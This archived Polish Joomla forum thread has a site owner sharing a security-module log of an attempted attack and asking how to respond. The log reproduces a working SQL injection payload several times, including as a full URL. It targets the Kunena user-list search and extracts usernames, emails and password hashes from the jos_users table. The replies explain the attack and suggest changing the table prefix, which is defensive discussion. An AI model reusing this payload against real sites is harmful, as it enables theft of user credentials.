PDA

Zobacz pełną wersję : Marco's interceptor warning - prosba o interpretacje



zaba600
22-10-2012, 10:42
Witam

Moj serwis : www.wybierzagd.com.pl

joomla 1.5.26

dzisiaj dostałem taki komunikat :

forum Marco's interceptor warning (javascript:void(0);)

czy mam sie czym martwic ? nie bardzo sie orientuje w komunikatach bezpieczenstwa ?

czy cos dodatkowo zabezpieczyc ?

dziekuje z gory za pomoc !




** Union Select [GET:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [GET:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Union Select [REQUEST:search] => %%\' and 1=2) union select 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;
** Table name in url [REQUEST:search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
88.252.249.187

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search=%25%25'%20and%201=2)%20union%20select%201,% 20concat( 0x62794467346e78,username,0x6861636b65642b62792b44 67346e78,password,0x2a2a73716c7661722a2a),concat(0 x3a,username,0x3a,email,0x3a,password,0x3a,activat ion),'Super%20Administrator','email','2009-11-26%2022:09:28','2009-11-26%2022:09:28',62,1,1,0,0,0,1,15%20from%20jos_user s--%20;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
-[option] => com_kunena
-[func] => userlist
-[search] => %%\' and 1=2) -- 1, concat(0x62794467346e78,username,0x6861636b65642b6 2792b4467346e78,password,0x2a2a73716c7661722a2a),c oncat(0x3a,username,0x3a,email,0x3a,password,0x3a, activation),\'Super Administrator\',\'email\',\'2009-11-26 22:09:28\',\'2009-11-26 22:09:28\',62,1,1,0,0,0,1,15 from -- users-- ;

Dziudek
22-10-2012, 11:13
Wygląda na to, że ktoś chciał wyciągnąć dane z bazy danych poprzez atak typu SQL Injection - pierwszym i podstawowym zabezpieczeniem jest zmiana standardowego prefiksu bazy danych z "jos_" na jakiś losowy (tak jak to robią instalatory Joomla! 2.5 i 3.0 przy instalacji, generując prefiks typu "dfhj898_").

zaba600
22-10-2012, 11:29
dzieki za info, czy po zmianie prefiksu muszę w związku z tą zmianą nanieść jeszcze jakieś zmiany w innych elementach joomla ?

Dziudek
22-10-2012, 11:31
Generalnie powinna wystarczyć zmiana w pliku configuration.php (tam jest zdefiniowany prefiks tabel bazy danych), niemniej wszystko zależy tutaj od rozszerzeń - dobrze napisane rozszerzenia nie powinny mieć z tym problemów - gorzej jeżeli autor rozszerzenia założył prefiks "jos_" w tabeli, ale myślę, że takie błędy programistyczne nie mają miejsca w żadnych znączacych rozszerzeniach ;)

zaba600
22-10-2012, 13:23
już wszystko jasne :)

zaba600
23-10-2012, 22:12
juz wczesniej zmienilem przedrostek (o czym zapomnialem) zrobilem wiekszosc zalecen na wiki , czy tu jeszcze mozna cos dodac ?

trzepiz
23-10-2012, 22:22
Twój "gość" to:

role: TT Administrative Contact Role
address: Turk Telekom
address: Network Direktorlugu
address: 06530 ANKARA
phone: +90 312 555 1920
fax-no: +90 312 313 1924

Zdecydowanie czas na zabezpieczanie się .... i to poważne zabezpieczanie :)

zaba600
23-10-2012, 22:47
hmmmmmm chyba tam zadzownie :)
a tak na poważnie co masz na myśli większość zaleceń z wiki wykonałem ,htaccess tez istnieje skonfigurowane na hasło ...